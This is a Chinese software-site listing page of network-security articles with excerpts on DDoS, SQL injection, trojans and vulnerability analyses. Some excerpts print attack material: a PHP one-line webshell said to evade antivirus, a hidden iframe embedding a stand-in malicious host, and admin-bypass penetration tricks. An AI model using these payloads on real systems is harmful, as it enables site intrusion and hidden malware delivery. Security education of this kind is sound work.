神马软件站
首页 > 网站运营 > 网络安全
什么是恶意网站?详解2016最新的钓鱼、黑客入侵、木马病毒教程
什么是恶意网站?详解2016最新的钓鱼、黑客入侵、木马病毒教程
当我们在访问一些网站是会弹出一些提示,有时候QQ管家、金山毒霸是经常弹出访问提示,不注意就会扣掉很多钱,那么真正的恶意网站又是怎么一回事,又有多少人彻底的明白呢?一起来看看吧。 | 前言 恶意网站在大...

11-12

黑客技术入门 十个常用破解网络密码的方法
黑客技术入门 十个常用破解网络密码的方法
个人网络密码安全是整个网络安全的一个重要环节,如果个人密码遭到黑客破解,将引起非常严重的后果,例如网络银行的存款被转账盗用,网络游戏内的装备或者财产被盗,QQ币被盗用等等,增强网民的网络安全意识是网络...

11-12

十三步简单入侵个人电脑教程
十三步简单入侵个人电脑教程
木马冰河是一款功能强大的远程控制软件,因为它的功能很强大所以成为了黑客们发动入侵的工具,2HK联盟Mask曾利用它入侵过数千台电脑,国外电脑也不例外,一起来看看哪十三步简单入侵个人电脑吧。 第一步 下...

11-12

黑客都很厉害吗 厉害的只是一小部分
黑客都很厉害吗 厉害的只是一小部分
国家正在修正关于黑客方面的法律法规,有一条震惊黑客圈的世纪佳缘起诉白帽黑客事件,深深的伤害了广大黑客们的心,加上扎克伯格和特拉维斯卡兰尼克账号被盗,于是黑客话题又开始变得火热,黑客真的如你所想神秘又强...

11-12

浅谈史上最大DDoS攻击的本质与防范
浅谈史上最大DDoS攻击的本质与防范
ddos攻击的意思是指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,最后可以成倍地提高拒绝服务攻击的威力。 DDos攻击在今天看来并不新鲜,近两年来发展态势也渐趋平缓,直至一个月前,欧洲反垃圾邮件组织Spamhaus突然遭受...

11-12

2016年上半年DDoS攻击趋势分析 DDoS攻击规模和频率不断攀升
2016年上半年DDoS攻击趋势分析 DDoS攻击规模和频率不断攀升
DDoS(分布式拒绝服务),是一种基于DoS的特殊形式的拒绝服务攻击,是一种分布、协作的大规模攻击方式,主要瞄准比较大的站点,象商业公司,搜索引擎和政府部门的站点,具有较大的破坏性。 2015年,DD...

11-12

详解如何通过“鼠洞”控制电脑
详解如何通过“鼠洞”控制电脑
入侵电脑防御是为了更好的做好防御准备,网络安全需要我们大家来维护,一起来看看通过鼠洞控制电脑吧。 通过鼠洞控制你的电脑 夜黑风高,一个黑色的身影窜入了一间电脑机房。熟练地打开了一台保存有重要数据的电脑。可是这个电脑里面的数据已经进行了加密,要获得这些...

11-12

如何逆向破解HawkEye keylogger键盘记录器进入攻击者邮箱
如何逆向破解HawkEye keylogger键盘记录器进入攻击者邮箱
面对恶意邮件攻击,我们就只能默默忍受被他攻击,连自我保护能力都没有谈什么反抗?让人痛快的是,如今有了解决办法,逆向破解键盘记录器,进入攻击者邮箱。 这一切要从一次恶意邮件攻击活动开始。下图为我们最近监...

11-12

大揭秘:原来黑客是这么破解MCU的
大揭秘:原来黑客是这么破解MCU的
对于黑客破解MCU有很多种方法,这里讲解了各种MCU的攻防技术,告诉你原来黑客是这么破解MCU的。 这篇文章是俄国人Sergei P.Skorobogatov就读英吉利剑桥大学之博士论文,讲解了各种M...

11-12

伪黑客的成功的秘密:tomcat入侵和Jboss入侵的方法介绍(图)
伪黑客的成功的秘密:tomcat入侵和Jboss入侵的方法介绍(图)
黑客必须要有专业的知识,丰富的经验。而伪黑客不需要,只需要几个工具,扫描默认口令、弱口令、漏洞,就能利用。比如许多人部署完系统后,没有良好的习惯和安全意识,对公网用户开放tomcat管理权限,且不变更默认口令。。 我们在分析多个被入侵的事件中,发...

11-12

Uread阅读器拒绝服务漏洞的分析与解决
Uread阅读器拒绝服务漏洞的分析与解决
Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。 远程攻击者可考虑将过长文件名的文件上传至至善读书的服务器端,实现远程拒绝服务攻击。 测试证明 ---------...

11-12

IIS短文件和文件夹泄漏漏洞的分析
IIS短文件和文件夹泄漏漏洞的分析
IIS是有微软使用微软windows功能扩展模块创建的一套web服务器应用程序,是世界上第三个最流行的服务器。 漏洞描述: 漏洞研究小组发现了一个微软IIS的漏洞,攻击者可以利用一个包含~的get请求,来让服务器上的文件和文件夹被泄漏、 影响版本: IIS 1.0, Windows...

11-12

分享PHP场景中getshell防御思路
分享PHP场景中getshell防御思路
1 背景概述 WEB应用漏洞导致的入侵时有发生,扫描器和WAF并不能解决所有的问题,于是尝试在主机侧针对PHP环境做了一个防御方案。很荣幸的邀请到TSRC部分白帽子做了一次对抗演习,本文主要分享一下防御思路。 防御方案主要想解决的问题是getshell、主机敏感文...

11-12

Linux系统采用netstat命令查看DDOS攻击的方法
Linux系统采用netstat命令查看DDOS攻击的方法
Linux系统用netstat命令查看DDOS攻击具体命令用法如下: 复制代码 代码如下:netstat -na 显示所有连接到服务器的活跃的网络连接 复制代码 代码如下:netstat -an | grep :80 | sort 只显示连接到80段口的活跃的网络连接,80是http端口,这对于web服务器非常有用...

11-12

SQL注入测试实例分析
SQL注入测试实例分析
本文详细讲述了 sql注入的原理及防范技巧,目的是让初学者利用SQL注入技术来解决他们面临的问题, 成功的使用它们,并在这种攻击中保护自己。希望能对大家有所帮助。 一、 介绍 当一台机器只打开了80端口, 你最依赖的漏洞扫描器也不能返回任何有用的内容, 并且...

11-12

DedeCms V5.6漏洞 变量未初始化 导致鸡助漏洞
DedeCms V5.6漏洞 变量未初始化 导致鸡助漏洞
漏洞描述: 健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出...

11-12

劫持流量原理是什么?关于劫持流量的种类和产生
劫持流量原理是什么?关于劫持流量的种类和产生
在鼠标点击的一刹那,流量在用户系统中流过层层节点,在路由的指引下奔向远程服务器。这段路程中短兵相接的战斗往往是最激烈的,在所有流量可能路过的节点往往都埋伏着劫持者,流量劫持的手段也层出不穷,从主页配置篡改、hosts劫持、进程Hook、启动劫持、LS...

11-12

各种网页挂马方式原理揭密(iframe挂马,script 挂马,图片伪装挂马等)
各种网页挂马方式原理揭密(iframe挂马,script 挂马,图片伪装挂马等)
下面介绍集中常见的网页挂马方式: (1)iframe 框架挂马 在网页上增加一行挂马的程序,例如: iframe src=http://www.xxx.com/xxx.html width=0 height=0/iframe 这种嵌入是的挂马非常常见,在Google中搜索发现的可能还有木马的网页,一般都是被这种方式挂...

11-12

SQL注入攻击(攻击与防范)
SQL注入攻击(攻击与防范)
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序...

11-12

过安全狗/D盾/360的PHP一句话木马
过安全狗/D盾/360的PHP一句话木马
D盾,他不认识二维数组,所以就很轻松绕过了。 对了 还有360哦~ 测试了下安全狗,也查不出来,,。 复制代码 代码如下: ?php $item['wind'] = 'assert'; $array[] = $item; $array[0]['wind']($_POST['whirlwind']); //密码whirlwind 菜刀 ? 过D盾PHP一句话木马 复制代...

11-12

远程控制木马最初、后来和现在面临的问题
远程控制木马最初、后来和现在面临的问题
远程控制木马的意思是远程桌面需要在路由器设置端口映射,才可以让自己的机器暴露给广域网,这样别人才能通过外网ip来连接操作需要接受协助的机器。 传统意义上的远程控制木马由于适用面不广,使用比较单一,只注...

11-12

网站MYSQL数据库高级爆错注入原分析
网站MYSQL数据库高级爆错注入原分析
这里主要用了mysql的一个BUG :http://bugs.mysql.com/bug.php?id=8652 grouping on certain parts of the result from rand, causes a duplicate key error. 重现过程: SQL Code复制内容到剪贴板 usemysql; createtabler1(aint);insertintor1values(1),(2),(1),(2),(1)...

11-12

网站个人渗透技巧收集与总结
网站个人渗透技巧收集与总结
1.利用网站过滤不严直接绕过后台验证,在网站后面加上 admin/session.asp 或 admin/left.asp 2.有的网站进后台会出现一个脚本提示框,输入:administrator 即可突破!admin代表以管理员身份进入的意思。 3.有的网站开了3389,入侵之前先去连接3389,尝试弱口令或是爆破...

11-12

中国南海和东南亚问题相关的网络攻击组织 捕获Patchwork APT攻击
中国南海和东南亚问题相关的网络攻击组织 捕获Patchwork APT攻击
南海仲裁这样的闹剧昨天还是宣布了一个可笑的判决,我泱泱大国昨天在海南广东等地派出的各种军队战舰证明这...

11-12

帝国备份王(Empirebak)万能cookie及拿shell方法与防御
帝国备份王(Empirebak)万能cookie及拿shell方法与防御
转自wooyun http://www.wooyun.org/bugs/wooyun-2014-078591 1.伪造cookie登录系统(其实这一步多余的,大多用户连密码都没改,都是默认的123456) 登录成功设置4个cookie,看代码 PHP Code复制内容到剪贴板 functionlogin($lusername,$lpassword,$key,$lifetime=0...

11-12

 1 2 3 4 5 6 7 8 9 10..73>
返回顶部